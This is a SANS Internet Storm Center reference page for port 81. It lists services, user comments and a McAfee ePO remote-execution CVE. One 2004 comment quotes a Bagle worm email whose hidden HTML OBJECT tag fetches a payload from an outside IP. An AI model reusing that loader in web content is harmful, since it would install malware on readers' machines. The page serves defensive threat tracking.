Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC Port Details:


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Graph

[show ascii data]
Graph Criteria
  • Start Date:
  • End Date:
  • Port:
  • Left Y Axis:
  • Right Y Axis:

Port Information

Protocol Service Name
tcp hosts2-ns HOSTS2 Name Server
tcp RemoConChubo [trojan] RemoConChubo
udp hosts2-ns HOSTS2 Name Server
tcp docs-to-go Palm Documents to Go
[get complete service list]

User Comment

Submitted By Date
Comment
Steve Arnold 2009-10-04 18:45:22
Reported today by Sophos as the port used by the e-mailed "carrier" (VBS script) of W32/Bagle-Q to download the virus.
TomazF 2009-10-04 18:45:22
new version (18.03.2004) of worm Beagle is working on port 81, opens PHP with ActiveX script ans install sm.exe -> \winnt\system32\directs.exe and infects then plenty of EXEs see virus email body: <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://219.15.112.80:81/257480.php"> </OBJECT></body></html> Rgrds, Tomaz
Diesel 2008-05-15 14:28:49
this port is used between http proxies
Just found 2008-04-29 18:22:33
igo-incognito user-authentication-for-watchguard-products IGo Incognito Data Port http://www.watchguard.com/training/lss/45/auth3.ht | http://www.micromuse.com/products/descriptions.htm | IGo Incognito Data Port
Joshua 2004-03-19 04:46:52
Secondary HTTP servers are often found on ports 81 through 83.
Tinga 2004-02-10 19:49:57
Port is also used for McAfee ePO console to server communications
Add a comment

CVE Links

CVE # Description
CVE-2004-38 "McAfee ePolicy Orchestrator (ePO) 2.5.1 Patch 13 and 3.0 SP2a Patch 3 allows remote attackers to execute arbitrary commands via certain HTTP POST requests to the spipe/file handler on ePO TCP port 81."